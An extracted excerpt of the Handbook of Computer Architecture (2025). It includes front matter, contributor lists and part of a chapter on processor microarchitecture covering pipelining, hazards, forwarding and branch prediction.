Chattopadhyay a. Handbook of Computer Architecture 2025
Chattopadhyay a. Handbook of Computer Architecture 2025
Editor
Handbook of
Computer
Architecture
Handbook of Computer Architecture
Anupam Chattopadhyay
Editor
Handbook of Computer
Architecture
This work is subject to copyright. All rights are solely and exclusively licensed by the Publisher, whether
the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse
of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and
transmission or information storage and retrieval, electronic adaptation, computer software, or by similar
or dissimilar methodology now known or hereafter developed.
The use of general descriptive names, registered names, trademarks, service marks, etc. in this publication
does not imply, even in the absence of a specific statement, that such names are exempt from the relevant
protective laws and regulations and therefore free for general use.
The publisher, the authors and the editors are safe to assume that the advice and information in this book
are believed to be true and accurate at the date of publication. Neither the publisher nor the authors or
the editors give a warranty, expressed or implied, with respect to the material contained herein or for any
errors or omissions that may have been made. The publisher remains neutral with regard to jurisdictional
claims in published maps and institutional affiliations.
This Springer imprint is published by the registered company Springer Nature Singapore Pte Ltd.
The registered company address is: 152 Beach Road, #21-01/04 Gateway East, Singapore 189721,
Singapore
This book presents a collective effort of several years. It would be impossible to list
everyone, who contributed, directly or indirectly, to the production of this volume.
In the following, a partial list of contributions and acknowledgment is offered.
I would first like to thank Springer representatives, Ramesh Premnath and
Stephen Yeung, who initially pitched this idea and helped to kickstart the book
concept. Avi Mendelson, in the early ideation stage, presented critical feedback
on the content and organization. I cannot but, express my most sincere gratitude
to the section editors, not listed in any particular order, Suhaib Fahmy, Mohamed
M. Sabry Aly, Jeronimo Castrillon, Grant Edmund Martin, and Sayak Ray. They
not only helped shape the book by presenting ideas on the content distribution
but also kept in close correspondence with the chapter authors for timely chapter
submission and reviewing the iterations, thereby ensuring the high quality of the
volume. Considering the fact that several section editors themselves contributed
chapters in this book, the effort is truly grand, for which I remain very thankful.
The chapter authors (nearly 100!) spent considerable time to summarize the vast
content of the computer architecture topics - relevant to their expertise - within
constraints of space. On behalf of section editors, I am sincerely thankful to the
authors for their valuable contribution.
Last but, not the least – Salmanul Faris Nedum Palli and Daniel Diwakar, who
were production editors of this book at various stages, worked tirelessly throughout
the production. I remain really thankful to them for the tremendous effort over years.
vii
Contents
Volume 1
1 Microarchitecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
Freddy Gabbay
2 The Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
Avi Mendelson
3 Architectures for Self-Powered Edge Intelligence . . . . . . . . . . . . . . . 89
Amit Ranjan Trivedi, Jaeha Kung, and Jong Hwan Ko
4 Real-Time Scheduling for Computing Architectures . . . . . . . . . . . . . 127
Arvind Easwaran, Michael Yuhas, Saravanan Ramanathan, and
Ankita Samaddar
5 Secure Processor Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
Nikhilesh Singh, Vinod Ganesan, and Chester Rebeiro
6 Bus and Memory Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 201
Trevor E. Carlson
ix
x Contents
Volume 2
Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1441
About the Editor
xiii
xiv About the Editor
Jeronimo Castrillon
Chair for Compiler Construction
cfaed – Center for Advancing Electronics Dresden
SCADS.AI – Center for scalable data analytics and
artificial intelligence Dresden/Leipzig
6G-life Hub – Digital transformation and sovereignty
of future communication networks
Technische Universität Dresden
Dresden, Germany
Suhaib A. Fahmy
King Abdullah University of Science and Technology
(KAUST)
Department of Computer, Electrical and Mathematical
Sciences and Engineering
Thuwal, Saudi Arabia
xv
xvi Section Editors
Sayak Ray
Intel Corporation
Intel Product Assurance and Security (IPAS)
San Jose, CA, USA
xvii
xviii Contributors
Roope Kaivola Core and Client Development Group, Intel Corporation, Hillsboro,
OR, USA
Ryan Kastner University of California San Diego, La Jolla, CA, USA
Ayesha Khalid Centre for Secure Information Technologies (CSIT), Queen’s
University Belfast, Belfast, UK
M. V. Achutha Kiran Kumar DEG, Intel Corporation, Bengaluru, India
Jong Hwan Ko Sungkyunkwan University (SKKU), Suwon, Republic of Korea
Tim Kogel Synopsys, Inc., Aachen, Germany
Akash Kumar Technische Universität Dresden, Dresden, Germany
Dur-e-Shahwar Kundi Centre for Secure Information Technologies (CSIT),
Queen’s University Belfast, Belfast, UK
Jaeha Kung Daegu Gyeongbuk Institute of Science and Technology (DGIST),
Daegu, Republic of Korea
Vadim Kustov Cadence Design Systems, Tensilica R&D, San Jose, CA, USA
Yi-Hsiang Lai Cornell University, Ithaca, NY, USA
Dirk Lanneer Synopsys, Leuven, Belgium
Zhaoying Li National University of Singapore, Singapore, Singapore
Tung-Che Liang Department of Electrical and Computer Engineering, Duke
University, Durham, NC, USA
Sung Kyu Lim Atlanta, USA
Gai Liu Xilinx, Inc., San Jose, CA, USA
Suhas Madhusudana Cadence Design Systems, Tensilica R&D, San Jose, CA,
USA
Grant Edmund Martin Pleasanton, CA, USA
Xavier Martorell Barcelona Supercomputing Center, Barcelona, Spain
Christian Menard Chair for Compiler Construction, TU Dresden, Dresden,
Germany
Avi Mendelson CS Department, Technion, Haifa, Israel
Farhad Merchant University of Groningen, Groningen, The Netherlands
Tulika Mitra National University of Singapore, Singapore, Singapore
Vojtech Mrazek Faculty of Information Technology, Brno University of Technol-
ogy, Brno, Czech Republic
xx Contributors
John O’Leary Core and Client Development Group, Intel Corporation, Hillsboro,
OR, USA
Miquel Pericàs Chalmers University of Technology, Gothenburg, Sweden
Christian Pilato Dipartimento di Elettronica, Informazione e Bioingegneria,
Politecnico di Milano, Milano, Italy
Andy D. Pimentel Parallel Computing Systems Group, University of Amsterdam,
Amsterdam, The Netherlands
Bharath Srinivas Prabakaran Institute of Computer Engineering, Technische
Universität Wien (TU Wien), Vienna, Austria
Saravanan Ramanathan Nanyang Technological University, Singapore,
Singapore
Behnaz Ranjbar Technische Universität Dresden, Dresden, Germany
Sandip Ray Department of ECE, University of Florida, Gainesville, FL, USA
Sayak Ray Intel Corporation, San Jose, CA, USA
Chester Rebeiro Indian Institute of Technology Madras, Chennai, India
Siva Satyendra Sahoo Technische Universität Dresden, Dresden, Germany
Ankita Samaddar Nanyang Technological University, Singapore, Singapore
Muhammad Shafique Engineering Division, New York University Abu Dhabi,
Abu Dhabi, United Arab Emirates
Nikhilesh Singh Indian Institute of Technology Madras, Chennai, India
Amit Kumar Singh University of Essex, Colchester, UK
Stephanie Soldavini Dipartimento di Elettronica, Informazione e Bioingegneria,
Politecnico di Milano, Milano, Italy
Nitish Srivastava Google LLC, Mountain View, CA, USA
Cynthia Sturton University of North Carolina at Chapel Hill, Chapel Hill, NC,
USA
Xavier Teruel Barcelona Supercomputing Center, Barcelona, Spain
Amit Ranjan Trivedi University of Illinois at Chicago, Chicago, IL, USA
Suryansh Upadhyay Pennsylvania State University, University Park, PA, USA
Johan Van Praet Synopsys, Leuven, Belgium
Yakir Vizel Technion - Israel Institute of Technology, Haifa, Israel
Zheng Wang Shenzhen Institute of Advanced Technology, Chinese Academy of
Sciences, Shenzhen, China
Contributors xxi
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Single-Cycle Processor Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Processor Data Path . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
Processor Control Unit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
Pipelining . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
Pipeline Principle and Performance Metrics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
Pipelined Processors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
Pipeline Hazards . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
Multiple-Issue Processor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
Abstract
F. Gabbay ()
The Institute of Electrical Engineering and Applied Physics, The Hebrew University of
Jerusalem, Jerusalem, Israel
Keywords
Introduction
In the past decades, CPUs have been challenged by incredibly growing number
of applications driven by the Internet revolution followed by the mobile and the
data revolutions which affect every field in everyday life. The growing demand for
performance, scale, and the diversity of use cases have continuously fueled the need
for advanced processor microarchitecture which can satisfy these goals. For several
decades, the advanced VLSI technology has been providing backwind to processor
performance through continuous increase in frequency. Even though at the first
decade of the twenty-first century, Moore’s law for frequency has ceased to exist, the
need for powerful processors has been continuously growing. Architects have been
required to bring revolutionary microarchitectural innovations to satisfy the growing
demand for powerful processing. Artificial intelligence applications and high-
performance computing have even heightened the performance bar by introducing a
demand for processing power in the scale of exaflops. Along with the need for high-
performance processors, power considerations have become crucial factor not only
for mobile applications and edge devices but also in cloud servers and datacenters
where power is a major part of operating expenses. New applications such as IoT,
wearable devices, edge computing, and the automotive market introduced specific
needs for customized processor where performance is not always the ultimate goal,
but rather cost, die area, real-time considerations, and heterogeneous integration of
processors, peripherals, and accelerators are in the main interest.
In this chapter a processor microarchitecture is introduced stepwise by rely-
ing on digital building blocks. The chapter starts with a single-cycle processor
microarchitecture where the design of both data-path and control unit is pre-
sented. The chapter broadly discusses microarchitectural design considerations of
the single-cycle processors and presents the metrics for performance evaluation.
Next, the pipelined processor core is presented with the data-path and control
1 Microarchitecture 5
A common processor design relies on the Von Neumann machine model which was
introduced by 1945 by John Von Neumann. The Von Neumann model proposes an
architecture for a digital computer which consists of the following elements:
• A central processing unit (CPU) that contains arithmetic logic unit (ALU, also
known as data path), local registers, and a control unit
• Memory unit that stores program instructions and data
• Input and output devices such as an external storage device, a network connec-
tion, a display, a keyboard, etc. (Fig. 1).
A similar processor model to the Von Neumann model is the Harvard architec-
ture (Sloss et al. 2004) depicted by Fig. 2. In the Harvard architecture scheme, a
separate memory is used for the program instructions and program data.
The Harvard architecture machine model will be the baseline for the processor
design to be discussed further. In this chapter, the processor architecture is assumed
to be a Reduced Instruction Set Architecture (RISC) (Hennessy and Patterson
2011) similar to MIPS (Hennessy and Patterson 2011) or RISCV (Patterson
and Watterman 2017) processors that employ the following types of instructions
(Table 1).
• Fetch – an instruction is fetched from memory, and the program counter (PC) is
incremented to the next instruction.
• Decode – an instruction is decoded; the control unit generates the needed control
signals for the data path. Source registers are read (when applicable) from the
register file.
1 Microarchitecture 7
The instruction fetch circuit is illustrated by Fig. 3. The pointer to the instruction to
be fetched from memory is maintained by the program counter (PC) register. The PC
is incremented by 4 (assuming 4-byte instruction size) every cycle, unless control
instruction changes the PC sequence. When the PC sequential order changes, the
new target address is loaded by the control signal PC-CTRL into the PC.
The instruction decode circuit is illustrated by Fig. 4. The process of decoding an
instruction involves extracting the opcode, source register 1 (sreg1), source register
2 (sreg2), destination register (dreg), and sign-extended immediate (sxtimm) fields
from the instruction binary code. In addition, sreg1, sreg2, and dreg signals are sent
to the register file to specify the identifiers of registers to be accessed. The register
file scheme, illustrated by this figure, consists of a bank of the architectural registers
which are accessible by one write port and two read ports. The number of read
and write ports is determined by the maximum number of source and destination
operands of an instruction. In the processor architecture presented in this chapter,
it is assumed up to two source operands and one destination operand. The read
ports are implemented by two multiplexors, each controlled by the corresponding
sreg1 and sreg2 signals. The outputs of the multiplexors provide the value of the
source operands being read, sregval1 and sregval2. The write port is implemented
by a decoder which asserts the enable signal to the register that corresponds to the
destination register, dreg. When the enable signal is asserted the write data, dregval
is sampled by the corresponding register. Note that the decoder is controlled by the
RegWrEn signal which enables writes to the register file. When RehWrEn=0 no
write operations can be performed.
The execution circuit, illustrated by Fig. 5, performs the computation of results
for ALU-type instructions. The sergval1 is connected to the first input port of the
ALU, while the second port is connected to sregval2 or the sign-extended immediate
value, sxtimm. The selection between the two possible options is performed by a
multiplexor controlled by the selimm signal. For load/store instruction, the ALU
calculates the effective address for the memory access instruction. The first port of
the ALU is fed by the base register (through sregval1), while the displacement field
is selected through the immediate field. For example, for lw r1, 100(r2) instruction,
the base register r2 value, read from the register file, is sent to the ALU through
the sregval1 signal, while the displacement, 100, is taken from the immediate field
of the instruction, sign extended, and selected by the multiplexor for the second
port of the ALU. Conditional control flow instructions are also processed by the
illustrated circuit. Typically, such instructions are indirect branches which indicate
their target address as an offset from the PC+4 in the immediate field of the
instruction binary code. The sign-extended immediate field, sxtimm, is added to the
PC+4 to calculate the target branch address in case that the control flow instruction
1 Microarchitecture 9
Fig. 5 Execution
is taken. In this case the new target address is loaded to the PC as it was illustrated
by Fig. 3. Conditional control flow instructions are also required to evaluate the
branch condition. In the presented design, it is assumed that there are two types
of conditional branch instructions beq or bne (similar to MIPS architecture (Kane
1988)). For both instructions the two sources operand are compared by the ALU
and in case they are equal, and the zero signal is set to 1; otherwise, the zero flag is
set to 0. The zero signal is used in conjunction with the instruction opcode (beq or
bne) by the control unit logic to generate the PC-ctrl signal depicted by Fig. 3.
The data memory access circuitry is illustrated by Fig. 6. The memory address,
calculated by the ALU, is sent to the data memory address through the ALUresult
signal. In case of data memory write (store instruction), the data to be written is read
from the register file using the second source operand identifier. The register value,
denoted by the sregval2, is connected to the Data in input of the data memory. In the
case of memory read (load instruction), the data read from the data out port of the
memory is connected to the Memout signal which is written to the register file by the
write-back circuitry. The memory control signal MemWrEn and MemRdEn control
the memory write and read operations, respectively. These signals are asserted by
the control unit base on the instruction opcode.
Finally, the write-back circuitry is shown by Fig. 7. Write-back operations can
be performed by either ALU instructions or load instructions. In accordance to the
instruction opcode, the control unit sets the MemALUsel signal of the multiplexor
to select between the ALUresult and the Memout values to be sent to the register
file write port signal, dregval.
The full data path is illustrated by Fig. 8. The depicted data path is obtained by
connecting all together the five circuits shown by the previous figures.
10 F. Gabbay
Fig. 7 Write-back
The processor control unit provides the control signals to the core data path as shown
by Fig. 9.
As it can be observed, the control unit has two input signals, the instruction
opcode and the zero indication. The control unit output signals are PC-ctrl, ALUctrl,
MemWrEn, MemRdEn, RegWrEn, and MemALUsel. The design of the control unit
for a single-cycle core can be obtained as a combinatorial circuit which is described
by the following truth tables for each of the instruction types (Tables 2, 3, and 4).
Pipelining
Now that the simple single-cycle processor has been designed, the next step is
focused in examining its performance in quantitative measures. As a reminder, the
single-cycle core, illustrated by Fig. 8, processes a single instruction every clock
cycle. It was previously identified that the processing of an instruction includes the
following phases summarized by Table 5 per instruction type.
As it can be observed by this table, the efficiency of the single-cycle process
is relatively low. For example, once an instruction is fetched, the fetch hardware
becomes idle through the rest of the phases till a new instruction is fetched again.
Similar idleness can be identified for the other hardware mechanisms such as the
decode logic, register file, ALU, and memory.
follows. As it can observed by the table below, the whole process of pizza making
takes 20 min; however, the pizzeria staff utilization is far from being optimal. The
dough preparation employee is utilized only 40% of the pizza preparation time,
while the utilization of the topping employee is as small as 10%, and the baking
employee is utilized 50% of the time. Such kind of pizza manpower is obviously
inefficient due to the hidden unemployment at every stage which is illustrated by
the following figure (Table 6).
The reason for the low utilization of the pizza line is due to the sequential
processing of every task. Every pizza line employee does not start processing of
a new pizza till the whole preparation of the previous pizza completed. In order to
quantitatively examine the pizza line, throughput is defined as the number of jobs or
tasks competed per time:
T asks Completed
T hroughput = (1)
T ime
As it can be observed from Fig. 10, the throughput of the pizza line is one
pizza per 20 min, or three pizzas per 1 h. The throughput and employee utilization
can be significantly improved if the pizza processing is executed in a pipelined
manner. Pipelining is a common technique which is used in varieties of applications
such as manufacturing lines and many others. The concept of a pipeline relies on
partitioning the processing of a job or a task into multiple pipeline stages, where
every stage starts the process of a new task as soon as it is available. As a result, all
pipeline stages work in parallel while processing different portion of different jobs
respectively. Pipelining the pizza line is illustrated by Fig. 11.
As it can be observed from this figure, all the three pizza line workers work
in parallel on three different pizzas. In addition, pizzas are moved from one stage
to another every 10 min. This is determined by the slowest stage which is the
pizza baking in the presented case. When examining the throughput of the pizza
line, it is observed that a pizza is completed every 10 min or six pizzas per hour.
Therefore, pipelining in this example gains a x2 throughput improvement with
respect to the sequential pizza line. It can also be noticed that the preparation time
of a single pizza has become even worse since it involves three pipeline stage of
10 min each resulting in a total preparation time of 30 min. In spite of the fact that
the latency of pizza preparation gets worse, the employee utilization is significantly
improved. For example, the dough preparation stage utilization is now 80%, while
the topping stage utilization is 20% and the baking stage utilization is 100%.
14 F. Gabbay
further improvement? The answer is yes, but this of course depends on whether the
tasks in every pipeline stage can be further divided into smaller stages. For example,
if one can break both the dough preparation stage and the baking stage into two equal
stages, then the following pizza line is obtained.
The pizza line illustrated by Fig. 12 consists of five pipeline stages. This time a
pizza is moved from one stage to another every 5 min and therefore the throughput
is six pizzas per 1 h. This yields a 2× throughput improvement with respect to the
three-stage pizza line and 4× throughput improvement with respect to the sequential
pizza line. Can one continue breaking the pipeline into more stages and gain an
infinite throughput? Although it might be implied theoretically, practically pipeline
stages cannot be infinitely broken into smaller stages, and this is due to several
reasons. First, it is not always possible to break a given task into smaller tasks, since
some operations may be indivisible (atomic) and second the process of moving the
pizza from one stage to another involves a certain overhead which was not taken
into account in the throughput calculation. For example, moving the pizza from one
stage to another requires some extra time for each of the employees to carry the
pizza to the next stage.
Pipelined Processors
stage and is used by the write-back stage as the identifier for the register file write
port.
The pipeline processor design also requires some slight modifications in the
control unit. Recall that the control unit is implemented as a combinatorial circuit
using the opcode and zero signal inputs to generate the needed control for the
processor data path. Since the opcode is available for the control unit at the decode
stage, the output control signals of the control unit need to be retimed to their
corresponding pipeline stages. The retiming of the controls signals is presented by
Fig. 15: The ALUctrl is retimed with one sampling stage to the execution stage.
18 F. Gabbay
The MemWrEn and MemRdEn are retimed to the memory stage with two sampling
stages. Finally, the MemALUSel and RegWrEn are retimed to the write-back stage
with three sampling stages.
Now that the five-stage pipeline core has been established, one can exercise the
processing of the following code through pipeline stages depicted by Fig. 16. The
pipelined processor achieves the maximum possible throughput of one instruction
completion per clock cycle. Is this always the case? Can the processor achieve the
maximum possible throughput for every program? This question will lead to the
next discussion.
Pipeline Hazards
By taking a deeper look at the pipelined processor, it is possible to identify that its
pipeline implementation may involve pipeline hazards. A pipeline hazard is defined
as a situation in the pipeline that may lead to an incorrect execution of an instruction.
Pipelined processors may have three types of pipeline hazards as the following:
• Data hazards
• Control hazards, and
• Structural hazards
Pipeline hazards are the next focus of the discussion: Data hazards may occur
due to incorrect data transfer between instructions, control hazards are related to
1 Microarchitecture 19
any control flow operation such as branch or jump, while structural hazards are
related to pipeline hardware design conflicts.
Data Hazards
In order to further examine the pipeline processor, one may consider the following
code.
As it can be observed by Fig. 17, instruction 1 writes to r1 while all the successive
instructions read r1. It can be observed that instruction 1 write r1 value in the
register-file only at clock cycle 5 while instructions 2, 3 and 4 read r1 before it is
updated in the register-file. Only instructions 5 and 6 in the example above read the
correct data of r1. This type of hazard is termed as a read-after-write (RAW) hazard
or true-data dependency. True-data dependency (or RAW hazard) occurs when an
instruction reads an outdated source operand because it has not been calculated
20 F. Gabbay
or written yet. This may lead to incorrect program execution, and therefore the
next discussion will delve into various microarchitectural solutions to this problem.
RAW hazard is the only type of data hazard that may occur in a single pipeline
processor. In the future discussions on multiple-issue processors, additional types
of data hazards will be introduced. Typically, RAW hazards are associated with data
that is transferred through register containers, though, theoretically, they can also
occur when data is transferred through memory. In a pipelined processor, RAW
hazards can only be related to registers rather than physical memory elements,
since all read and write memory accesses take place at the same pipeline stage, the
Memory stage. How can data hazards be solved then? The simple method is to have
the compiler insert no-operation (nop) instructions between true-data-dependent
instructions. This is illustrated by Fig. 18.
Nop instruction insertion method has a major impact on pipeline utilization. As
it can be observed by Fig. 18, such an approach reduces pipeline utilization and
increases the effective CPI of the processor. Instruction scheduling, illustrated by
Fig. 19, is another approach to handle data hazards. In this case, the compiler (or the
programmer) reschedules instruction order within the program (while preserving
the program correctness) with independent instructions. Instruction scheduling can
significantly help improving the pipeline utilization if independent instructions can
be found for rescheduling. The limitation of such a technique is mainly due to the
fact that it is performed at compile time where the pool of candidate-independent
instructions for rescheduling may be limited due to the lack of run-time information
(such as branch direction, etc.).
A similar approach to the nop insertion is a hardware-based interlock mechanism
which dynamically detects the data hazards and generates pipeline stalls which
performance-wise are equivalent to the nop insertion (Fig. 20).
Since this is implemented by the hardware, the compiler is dismissed from the
process of nop insertion, and therefore the program footprint size is smaller. A
pipeline interlock scheme typically consists of two logical functions: (1) RAW
hazard detection and (2) Stall insertion, as illustrated by Fig. 21. The RAW hazard
detection circuitry performs comparisons of the source registers (sreg1 and sreg2)
of the instruction in the decode stage with the destination register (dreg) of the
instructions at the execute, memory, and write-back stages. In case of match, a
stall-generation signal is asserted. The stall-generation signal is connected to the
processor control unit which overrides the control signals generated for the decoded
instruction (presented by Tables 2, 3, and 4). In the case when the stall generation
is true, the control signals are overridden with the values presented by Table 8.
These overridden values are equivalent to nop-operation instruction since they keep
the architectural state of the process unchanged. The overridden control signals will
continue to be inserted into the pipeline till the stall generation signal becomes false.
22 F. Gabbay
second instruction, which is data dependent on the first one, needs the value of
r1 only when it starts execution. If one can bypass the register file-based data
transfer between instructions, these data hazards and stalls may be eliminated.
The concept of the forwarding idea relies on this principle by employing a bypass
network (also termed forwarding network) which allows instruction to transfer date
while bypassing the register file (this technique is also sometimes referred to as
bypassing). In order to implement the forwarding mechanism, the first step is to
modify the register file implementation (which is presented by Fig. 4). The new
implementation, illustrated by Fig. 22, allows write and reads of the same register to
take place at the same clock cycle. This is done by adding two bypass multiplexors
and two comparators. Each of the comparators compares the destination register
identifier with the source register identifiers. In case of match, the multiplexors
replace the original value read from the register file with the value of the register
being written. This scheme helps to eliminate one out of the three stall cycles in
the pipelined processor, as illustrated by Fig. 23, since write and read operations to
the same register are now allowed to take place at the same clock cycle. In order to
further eliminate the additional pipeline stalls and improve pipeline utilization, the
forwarding network illustrated by Fig. 24 is introduced.
The illustrated forwarding network monitors the destination register identifiers of
instructions which completed their execution or memory stage and compares it with
the sreg1 and sreg2 register identifiers of the instruction that entered the execute
stage. In case of match, the most update value of the corresponding register is
replaced by the 3-to-1 multiplexors illustrated by the figure above. It should be noted
that the forwarding logic complicates the pipeline design. Additional hardware
is added (comparators, multiplexors, and interconnect wires) which may increase
silicon area and power. In addition, it may affect the critical path of the logical
circuit, resulting in reduced clock frequency. Another implementation option for the
forwarding network as part of the microarchitectural considerations is to retime the
comparators and move them from execution stage to the decode stage as illustrated
by the following figure (Fig. 25).
1 Microarchitecture 25
Control Hazards
Control hazards, also known as control dependencies, occur in pipelined processors
whenever the control flow of the processor is changed. Ideally, if computer programs
could be written without jumps or conditional branches, control hazards would be
26 F. Gabbay
avoided. For the sake of simplicity, three types of control flow instructions are
considered:
All three types of control flow instructions can change the program counter
and disrupt the sequential instruction fetch process. Unfortunately, the processing
of such instructions cannot take place immediately as soon as they enter the
pipeline since they require processing which takes several clock cycles until their
resolution. The resolution process of control flow instruction involves identifying
the instruction type, calculating the target address, and evaluating the branch
condition for conditional branches. As a result, as long as the outcome of such
control flow instructions is not resolved, the next instruction to be fetched into
the pipeline cannot be determined. In the pipelined processor design, illustrated by
Fig. 14, the resolution of control flow instructions occurs at the memory stage where
the PC control is generated, and the target address updates the program counter.
1 Microarchitecture 27
This phenomenon, known as control hazard, may result in incorrect execution due
to consecutive instruction fetch until the resolution. This situation is illustrated by
Fig. 28 where it can be observed that in the case that the conditional branch is taken,
three consecutive instructions are fetched and executed till the branch processing is
resolved (memory stage).
One of the possible solutions for control hazards is to stall the pipeline in a
similar fashion to data hazards by employing the pipeline interlock mechanism.
This may guarantee the correct execution of a program, but it will lead to a major
performance degradation since control flow instructions are quite frequent. For
example, assume a program with an ideal CPI=1 and branch frequency of 20%.
Every branch instruction in the presented processor will involve three stall cycles
until resolution. Therefore, the effective CPI becomes 1+0.2*3=1.6. This is a major
performance degradation of 37.5% in respect to the ideal CPI. It can also be noted
that the deeper the pipeline is, the greater is the branch penalty. For example, by
breaking every pipeline stage of the processor into two stages, the branch resolution
stage is now at the seventh or eighth stage. Such a pipelined processor will incur
6–7 clock cycle penalty for every control flow instruction.
Moving forward, while keeping Amdahl’s law in mind (“make the common case
run faster”), there is an essential need for effective solution to guarantee correct
program execution while improving utilization of the pipelined processor. Toward
that direction, the first step to handle control hazards is to reduce the branch penalty.
This can be done by moving the branch resolution stage to an earlier pipeline stage.
In the current processor design, the branch resolution takes place at the memory
stage. Assuming that the branch resolution can move to the decode stage, the branch
penalty can be reduced from three clock cycles to one clock cycle. The required
microarchitectural changes in the pipeline data path are depicted by Fig. 29 in a
light gray color. First, the adder that calculates the target address is moved from the
execution stage to the decode stage. Next, a new comparator is added to compare to
28 F. Gabbay
Fig. 29 Pipeline data path with branch resolution at the decode stage
source register values. This was previously done by the ALU at the execution stage,
and since the ALU can be busy processing the instruction in the execution stage, it
can no longer be considered to do this task. There are several important implications
related these changes: (1) The added logic increases die area and power. (2) The
logical path calculating the PC target becomes much more stressed for timing point
of view. This is because at the same clock cycle, the PC is incremented by 4, the sign
extended immediate is added, and the target address is sent through a multiplexor to
the PC register. This timing path is shown in red color in Fig. 29. From the design
point of view, assuming that this path is not the critical path of the processor (ALU
and memory-related logical path typically take longer processing time), this will
still require using faster logical elements and as a result may affect the processor
power.
Figure 30 illustrates the control hazard when branch resolution is moved to the
decode stage. It can be observed that it is possible to reduce the control hazard
penalty in the processor from three cycles to one cycle.
The proposed design changes in the processor to perform the branch resolution at
the decode stage affect the forwarding mechanism. So far, the assumption is that the
forwarded values are needed at the execution stage; now, de facto, the processing of
control flow instructions is performed at the decode stage. This implies that when the
branch instruction is true-data dependent on a predecessor instruction, the branch
will be stalled at the decode stage for one clock cycle till the dependent source
value can be forwarded. This situation, illustrated by Fig. 31, requires two design
modifications in the pipelined processor:
• The forwarding network will have to be changed such that it will be able to
perform forwarding to control flow instructions at the decode stage. This will
1 Microarchitecture 29
Fig. 31 RAW hazards associated with branch instruction processed at the decode stage
add additional comparators and multiplexors which may stress timing paths and
can increase cycle time and power.
• The pipeline control unit will have to detect this situation and stall the branch for
additional clock cycle at the decode stage.
The next improvements for handling control hazards are based speculation and
also known as branch prediction. The principle of branch speculation relies on
two fundamental mechanisms: (1) A branch predictor and (2) A pipeline flush
mechanism which can flush all mis-speculated (mis-predicted) instructions which
follow the branch. As long as the prediction is correct, the branch penalty is saved;
however, in case of mis-speculation, the flush mechanism is activated to invalidate
all the instructions from the mis-predicted path. The flush mechanism is usually
implemented in the microprocessor control unit. Upon detection of branch mis-
prediction, the control performs the flush by invalidating all the control signals of
the instructions in a similar fashion to the stall generation described earlier.
Before moving forward with the branch predictor discussion, the performance
metrics to be used for quantitative performance evaluation of branch prediction
schemes are defined. The first metric, branch mis-prediction rate (MR), is defined as
30 F. Gabbay
There are two types of branch prediction mechanisms: static and dynamic. Static
branch prediction usually provides a constant prediction of not taken and continues
fetching instructions in a sequential manner. Once the branch is resolved if the
prediction was found to be correct, then the branch penalty is avoided; however,
if the branch is mis-speculated (or mis-predicted), all the instructions for the
mis-speculated path are flushed. Static prediction of taken is more complicated
to implement since the branch target is unknown at the fetch stage. Dynamic
branch predictors attempt to predict both branch direction and target address
dynamically by learning branch behavior based on their history. The most common
implementation of dynamic branch predictor is termed Branch Target Buffer (or
BTB), which is illustrated by Fig. 32.
The BTB is organized in a cache structure. Each BTB entry consists of Tag, valid
bit, target address, and a history bit. The look-up process in the BTB is performed
usually at the fetch stage and is similar to the cache memory look-up process. The
index field from the PC selects a set, while the tag field is compared against the tag in
the entries of all the ways within the set. In case one of the tag matches and valid=1,
the look-up process achieves (BTB hit), when the target field and the history bits
are read from the corresponding matched entry. The history bit is used to determine
the branch direction. If the history bit is 1, the branch will be predicted as taken;
otherwise, the branch will be assumed not taken. When the branch is predicted as
taken, the target field will be loaded to the PC in the next clock cycle. The fetch stage
will continue fetching instructions from the target address in a consecutive manner.
In case of BTB miss (PC is not found in the BTB), the fetch stage continues the
instruction fetch in a sequential manner. Once the branch is resolved, the following
action takes place:
• The BTB is updated based on the branch resolution: both history and target fields.
• In case of branch mis-prediction, the instructions from the wrong branch path are
flushed from the pipeline and the PC is loaded with the correct address.
instruction is always mis-predicted, i.e., the MR=100%, while in the second the
predictor gains MR of nearly 50%. The last branch instruction is predicted correctly
in all iterations except the first and the last iterations. More advanced branch
predictors, termed two-level branch predictors (Yeh and Patt 1991), perform their
prediction in two stages. The types of predictors can be classified into two groups:
local predictors and global predictors. Local two-level predictors perform their
prediction based on local (private) past history of every branch instruction, while
global two-level predictors use the global history of recent branches executed for
the prediction process.
The baseline scheme of the two-level local predictor, depicted by Fig. 35,
expands the one-bit history field shown in Fig. 32 to multiple history bits. An n-bit
history field, termed BHR (Branch History Register), represents the local history of
the corresponding branch. For example, for n=3 a history of 101 represent a branch
that was taken, not taken, and then taken. The n-bit BHR field is used as an index
to address the second level of the BTB which consists of sets of saturated counters.
The prediction is determined based on the state of the counter which corresponds
the BHR value. In the baseline scheme, every branch history is associated with a
private set of saturated counters, but since this may introduce expansive die area
cost, various compromises were suggested. For example, in the Pentium III two-
level BTB, all branches within the same BTB set share the same set of counters.
The Alpha 21264 (1999) shares one set of counters with all BTB entries. Other
